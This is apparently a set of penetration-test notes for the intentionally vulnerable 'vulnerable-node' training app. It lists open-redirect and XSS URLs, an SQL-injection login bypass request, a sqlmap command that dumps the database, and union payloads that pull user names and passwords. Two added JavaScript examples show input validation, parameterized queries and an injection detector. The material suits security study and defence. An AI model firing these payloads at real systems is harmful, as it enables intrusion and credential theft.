https://github.com/cr0hn/vulnerable-node

* Open Redirect:
http://172.17.0.1:3000/login?returnurl=//google.com

* XSS:
http://172.17.0.1:3000/login?returnurl=/%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E%3C
http://172.17.0.1:3000/login?returnurl=//google.com&error=%3CIMG%20SRC=X%20ONERROR=%22alert(/XSS/)%22%3E
http://172.17.0.1:3000/products/search?q=%3Cimg+src%3Dx+onerror%3Dalert(/xss/)%3E
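The open redirect and the first two XSS links all come from the same unchecked `returnurl` and `error` parameters on the login page. The following is an added example, not code from this paste or from the vulnerable-node project: a validator that accepts only a local path as the redirect target and an escaper for the error text, wired into a small render function. The function names (`safeReturnUrl`, `escapeHtml`, `renderLoginResponse`) and the allowed character set are assumptions.

```javascript
// Added example, not code from the paste or from the vulnerable-node project.
// It shows the two checks that close the findings above: validating `returnurl`
// before it reaches a Location header or a hidden form field, and HTML-escaping
// `error` before it is interpolated into the login page. Names are assumed.

// A safe return target is a single local path: exactly one leading "/", not
// followed by "/" or "\" (browsers read "//host" and "/\host" as a new origin),
// and only plain URL characters after it. Anything else falls back to "/".
const LOCAL_PATH = /^\/(?![\/\\])[A-Za-z0-9\/._~?=&%-]*$/;

function safeReturnUrl(value, fallback = '/') {
  // Express yields an array for a repeated parameter; treat that as invalid too.
  if (typeof value !== 'string') return fallback;
  return LOCAL_PATH.test(value) ? value : fallback;
}

// Minimal HTML escaping, sufficient for text nodes and double-quoted attributes.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// How a login handler would use both: the redirect target is validated and the
// error message is escaped before either reaches the response.
function renderLoginResponse(query) {
  const target = safeReturnUrl(query.returnurl);
  const errorHtml = query.error ? `<p class="error">${escapeHtml(query.error)}</p>` : '';
  return {
    redirectTo: target,
    html: `${errorHtml}<form method="post" action="/login/auth">` +
          `<input type="hidden" name="returnurl" value="${escapeHtml(target)}"></form>`,
  };
}

// The second XSS link from the paste, run through the hardened handler:
console.log(renderLoginResponse({
  returnurl: '//google.com',
  error: '<IMG SRC=X ONERROR="alert(/XSS/)">',
}));
```

The allow-list is deliberately narrow: rejecting rather than "fixing" an unexpected value keeps the logic easy to audit, and a rejected `returnurl` simply lands the user on the site root.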
* SQL Injection (auth bypass):
POST /login/auth HTTP/1.1
Host: 172.17.0.1:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

username=admin&password=qwerty%27+or+%271%27%3D%271%27+limit+1+--+x&returnurl=
* Time Based SQL Injection (auth; database dump):
Exploit it with sqlmap; the following command extracts the database name, the current user and all tables:
~/soft/sqlmap/sqlmap.py -r nodejs-vuln.txt --technique=T --current-user --current-db --tables

Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=admin&password=' AND 2583=(SELECT 2583 FROM PG_SLEEP(5)) AND 'owAo'='owAo&returnurl=

nodejs-vuln.txt:
POST /login/auth HTTP/1.1
Host: 172.17.0.1:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

username=admin&password=*&returnurl=
* SQL Injection (union based; product detector style):
http://172.17.0.1:3000/products/detail?id=1%27%20and%20%273018%27%3d%273018
http://172.17.0.1:3000/products/detail?id=1%27%20or%20%273018%27%3d%273018%27%20limit%201%20--%20x
http://172.17.0.1:3000/products/detail?id=1' or '3018'='3018' limit 1 -- x

Burp SQL detector style:
http://172.17.0.1:3000/products/detail?id=1' and '3018'='3018
http://172.17.0.1:3000/products/detail?id=1' and '3018'='3019
http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,%272%27,%273%27,%274%27,%275%27%20from%20users%20limit%201%20--%20x
http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,name,password,%274%27,%275%27%20from%20users%20limit%201%20--%20x
http://172.17.0.1:3000/products/detail?id=1423123' union select '1',name,password,'4','5' from users limit 1 -- x

SQL Injection (product search):
http://172.17.0.1:3000/products/search?q=%27%20and%201=2%20--%20x
http://172.17.0.1:3000/products/search?q=' and 1=2 -- x
http://172.17.0.1:3000/products/search?q=' and 1=1 -- x
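The auth bypass, the time-based sqlmap run and the union/search injections above all rest on the same defect: request values concatenated into SQL text. The following is an added example, not code from this paste or from the vulnerable-node project. Part 1 shows that string-built login query beside the parameterized form that the node-postgres (`pg`) client accepts; part 2 is a small detector for the four injection shapes that appear in this paste, run over constructed, URL-decoded request-log lines modelled on them. The function names (`unsafeLoginSql`, `safeLoginQuery`, `looksLikeSqli`, `scanForSqli`), the `users` table layout and the sample log lines are assumptions.

```javascript
// Added example, not code from the paste or from the vulnerable-node project.
// Part 1: the string-built login query that the auth-bypass payload subverts,
// next to the parameterized form. Part 2: a detector for the injection shapes
// seen in the paste, run over constructed request-log lines. Names are assumed.

// Vulnerable form: user input is concatenated into the SQL text, so a quote in
// the password closes the string literal and the remainder is parsed as SQL;
// the trailing "-- x" comments out the closing quote the code appends.
function unsafeLoginSql(username, password) {
  return "SELECT * FROM users WHERE name = '" + username +
         "' AND password = '" + password + "'";
}

// Hardened form: the SQL text is fixed and the values travel separately, so the
// driver never parses them as SQL. pg's client.query() accepts this object as-is.
function safeLoginQuery(username, password) {
  return {
    text: 'SELECT * FROM users WHERE name = $1 AND password = $2',
    values: [username, password],
  };
}

// Detection: each pattern corresponds to one technique used in the paste.
const SQLI_PATTERNS = [
  { name: 'quoted tautology', re: /'\s*(or|and)\s*'?\w+'?\s*=\s*'?\w+/i },  // ' or '1'='1
  { name: 'union select',     re: /union\s+(all\s+)?select/i },
  { name: 'time-based sleep', re: /pg_sleep\s*\(/i },
  { name: 'trailing comment', re: /--\s*\w*$/ },
];

function looksLikeSqli(value) {
  return SQLI_PATTERNS.some((p) => p.re.test(value));
}

// Returns the indices of the lines that match at least one pattern.
function scanForSqli(lines) {
  return lines.flatMap((line, i) => (looksLikeSqli(line) ? [i] : []));
}

// Constructed log lines: URL-decoded paths and bodies modelled on the paste,
// plus two benign requests (one containing an apostrophe) as negative cases.
const SAMPLE_REQUESTS = [
  "POST /login/auth body=username=admin&password=qwerty' or '1'='1' limit 1 -- x",
  "POST /login/auth body=username=admin&password=' AND 2583=(SELECT 2583 FROM PG_SLEEP(5)) AND 'owAo'='owAo",
  "GET /products/detail?id=1423123' union select '1',name,password,'4','5' from users limit 1 -- x",
  "GET /products/search?q=' and 1=1 -- x",
  "GET /products/search?q=running shoes",
  "POST /login/auth body=username=o'brian&password=Tr0ub4dor&3",
];

console.log(unsafeLoginSql('admin', "qwerty' or '1'='1' limit 1 -- x"));
console.log(scanForSqli(SAMPLE_REQUESTS)); // [ 0, 1, 2, 3 ]
```

The detector is a triage aid, not a fix: it is meant for scanning decoded request logs after the fact, and the parameterized query is what actually removes the bug. Note that the benign apostrophe in `o'brian` is not flagged, because the tautology pattern requires `or`/`and` and a comparison after the quote.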
* CSRF: pervasive throughout the application.